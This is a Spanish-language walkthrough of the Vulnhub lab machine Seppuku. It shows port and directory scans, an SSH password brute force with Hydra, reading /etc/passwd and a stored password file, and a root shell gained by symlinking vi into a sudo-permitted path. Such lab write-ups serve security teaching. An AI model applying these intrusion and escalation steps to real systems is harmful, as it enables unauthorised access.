LaCashita!

[VLN] Seppuku

Hoy vamos a hackear la maquina de Vulnhub llamada Seppuku. Podeis descargarla desde el siguiente enlace: Seppuku

Video

Enumeration

Empezamos con un nmap para ver que puertos tiene abiertos.


sml@m0nique:~$ nmap -A -p- 192.168.112.132
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-18 22:31 CEST
Nmap scan report for 192.168.112.132
Host is up (0.0010s latency).
Not shown: 65527 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.3
22/tcp   open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 cd:55:a8:e4:0f:28:bc:b2:a6:7d:41:76:bb:9f:71:f4 (RSA)
|   256 16:fa:29:e4:e0:8a:2e:7d:37:d2:6f:42:b2:dc:e9:22 (ECDSA)
|_  256 bb:74:e8:97:fa:30:8d:da:f9:5c:99:f0:d9:24:8a:d5 (ED25519)
80/tcp   open  http        nginx 1.14.2
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Restricted Content
|_http-server-header: nginx/1.14.2
|_http-title: 401 Authorization Required
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
7080/tcp open  ssl/http    LiteSpeed httpd
|_http-server-header: LiteSpeed
|_http-title:  404 Not Found
| ssl-cert: Subject: 
commonName=seppuku/organizationName=LiteSpeedCommunity/stateOrProvinceName=NJ/co
untryName=US
| Not valid before: 2020-05-13T06:51:35
|_Not valid after:  2022-08-11T06:51:35
|_ssl-date: 2020-05-18T20:32:26+00:00; 0s from scanner time.
| tls-alpn: 
|   h2
|   spdy/3
|   spdy/2
|_  http/1.1
7601/tcp open  http        Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Seppuku
8088/tcp open  http        LiteSpeed httpd
|_http-server-header: LiteSpeed
|_http-title: Seppuku
Service Info: Host: SEPPUKU; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 59m59s, deviation: 2h00m00s, median: 0s
|_nbstat: NetBIOS name: SEPPUKU, NetBIOS user: , NetBIOS MAC: 
 (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: seppuku
|   NetBIOS computer name: SEPPUKU\x00
|   Domain name: \x00
|   FQDN: seppuku
|_  System time: 2020-05-18T16:32:22-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-05-18T20:32:23
|_  start_date: N/A

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.21 seconds

Vemos que tiene varios puertos abiertos. Vamos a echar un vistazo al puerto 7601 para ver si encontramos algo interesante.


sml@m0nique:~$ gobuster dir -u http://192.168.112.132:7601 -w 
/usr/share/wordlists/dirb/big.txt -x php,txt,htm,html
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.112.132:7601
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt,htm,html
[+] Timeout:        10s
===============================================================
2020/05/18 22:35:58 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htpasswd.txt (Status: 403)
/.htpasswd.htm (Status: 403)
/.htpasswd.html (Status: 403)
/.htpasswd.php (Status: 403)
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/.htaccess.htm (Status: 403)
/.htaccess.html (Status: 403)
/a (Status: 301)
/b (Status: 301)
/c (Status: 301)
/ckeditor (Status: 301)
/d (Status: 301)
/database (Status: 301)
/e (Status: 301)
/f (Status: 301)
/h (Status: 301)
/index.html (Status: 200)
/keys (Status: 301)
/production (Status: 301)
/q (Status: 301)
/r (Status: 301)
/secret (Status: 301)
/server-status (Status: 403)
/stg (Status: 301)
/t (Status: 301)
/w (Status: 301)
===============================================================
2020/05/18 22:36:08 Finished
===============================================================

Encontramos 2 directorios interesantes: /keys y /secret. En el directorio http://192.168.112.132:7601/keys vemos que hay un fichero llamado private... Lo descargamos, y le damos permisos "600" porque parece ser una key de ssh.


sml@m0nique:~$ wget http://192.168.112.132:7601/keys/private -O private.pkey
sml@m0nique:~$ chmod 600 private.key

En http://192.168.112.132:7601/secret/ podemos ver el fichero password.lst. Parece un diccionario, asi que lo descargamos.


sml@m0nique:~$ wget http://192.168.112.132:7601/secret/password.lst -O 
psecret.txt

Hacemos bruteforce(ssh) al usuario seppuku con el diccionario que hemos encontrado :)


sml@m0nique:~/$ hydra -l seppuku -P psecret.txt 192.168.112.132 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret 
service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-18 
23:26:28
[WARNING] Many SSH configurations limit the number of parallel tasks, it is 
recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 93 login tries (l:1/p:93), 
~6 tries per task
[DATA] attacking ssh://192.168.112.132:22/
[22][ssh] host: 192.168.112.132   login: seppuku   password: eeyoree
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-18 
23:26:43

Encontramos la clave para sepukku, asi que nos logueamos.

Low Shell


sml@m0nique:~/$ ssh seppuku@192.168.112.132 bash
seppuku@192.168.112.132's password: 
seppuku@seppuku:~$ id
uid=1000(seppuku) gid=1000(seppuku) 
groups=1000(seppuku),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev
),109(netdev)

seppuku@seppuku:~$ sudo -l
Matching Defaults entries for seppuku on seppuku:
    env_reset, mail_badpass, 
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User seppuku may run the following commands on seppuku:
    (ALL) NOPASSWD: /usr/bin/ln -sf /root/ /tmp/

Vemos que puede ejecutar un comando con "sudo" el cual linka el directorio root a tmp. Lo ejecutamos...


seppuku@seppuku:~$ /usr/bin/ln -sf /root/ /tmp/

Seguimos explorando el sistema.


seppuku@seppuku:~$ ls -la
total 28
drwxr-xr-x 3 seppuku seppuku 4096 May 18 16:30 .
drwxr-xr-x 5 root    root    4096 May 13 04:50 ..
-rw-r--r-- 1 seppuku seppuku  220 May 13 00:28 .bash_logout
-rw-r--r-- 1 seppuku seppuku 3526 May 13 00:28 .bashrc
drwx------ 3 seppuku seppuku 4096 May 13 10:05 .gnupg
-rw-r--r-- 1 root    root      20 May 13 04:47 .passwd
-rw-r--r-- 1 seppuku seppuku  807 May 13 00:28 .profile
seppuku@seppuku:~$ cat .passwd
12345685213456!@!@A

Vemos que el contenido del fichero .passwd posiblemente sea una password, asi que miramos que usuarios hay en el sistema para probar.


seppuku@seppuku:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System 
(admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time 
Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network 
Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
seppuku:x:1000:1000:seppuku,,,:/home/seppuku:/bin/rbash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
lsadm:x:998:1001::/:/sbin/nologin
ftp:x:106:113:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
samurai:x:1001:1002:,,,:/home/samurai:/bin/rbash
tanto:x:1002:1003:,,,:/home/tanto:/bin/rbash

Intentamos con samurai:


seppuku@seppuku:~$ su samurai
su samurai
Password: 12345685213456!@!@A
samurai@seppuku:~$ id
uid=1001(samurai) gid=1002(samurai) groups=1002(samurai)

Ahora, como samurai, vemos que podemos hacer...


samurai@seppuku:~$ sudo -l

Matching Defaults entries for samurai on seppuku:
    env_reset, mail_badpass,
    
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User samurai may run the following commands on seppuku:
    (ALL) NOPASSWD: /../../../../../../home/tanto/.cgi_bin/bin /tmp/*

El comando sudo nos deja usar un comando, pero esta dentro de la home del usuario tanto... Dejamos esta shell abierta como "samurai". Abrimos una shell nueva y probamos si con la key "private" que hemos encontrado antes, nos podemos loguear como tanto.


sml@m0nique:~/$ ssh -i private tanto@192.168.112.132
Linux seppuku 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed May 13 10:53:17 2020 from 192.168.1.48
tanto@seppuku:~$

Privilege Escalation

Bien, estamos dentro. Vamos a hacer un enlace simbolico de "vi" en /home/tanto/.cgi_bin/bin. De ese modo, el usuario samurai podra hacer "sudo" y entonces ejecutara vi para ver el fichero "root.txt" y por otro lado, podremos obtener una shell de root usando vi para ejecutar "sh".


tanto@seppuku:~$ bash -i
tanto@seppuku:~$ mkdir .cgi_bin
tanto@seppuku:~$ cd .cgi_bin
tanto@seppuku:~/.cgi_bin$ ln -s /bin/vi bin

Ahora que hemos hecho nuestro "trabajo" como "tanto", ejecutamos como usuario samurai:


samurai@seppuku:~$ sudo /../../../../../../home/tanto/.cgi_bin/bin 
/tmp/../tmp/root/root.txt

Se nos abrira el fichero root.txt con la flag, con el editor vi. Si queremos shell de root, en vi ejecutaremos:


:!/bin/sh

Y ya seremos root :)

root.txt


# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
root.txt
# cat root.txt
{SunCSR_Seppuku_2020_X}

End

Y con esto ya seriamos root de la maquina :)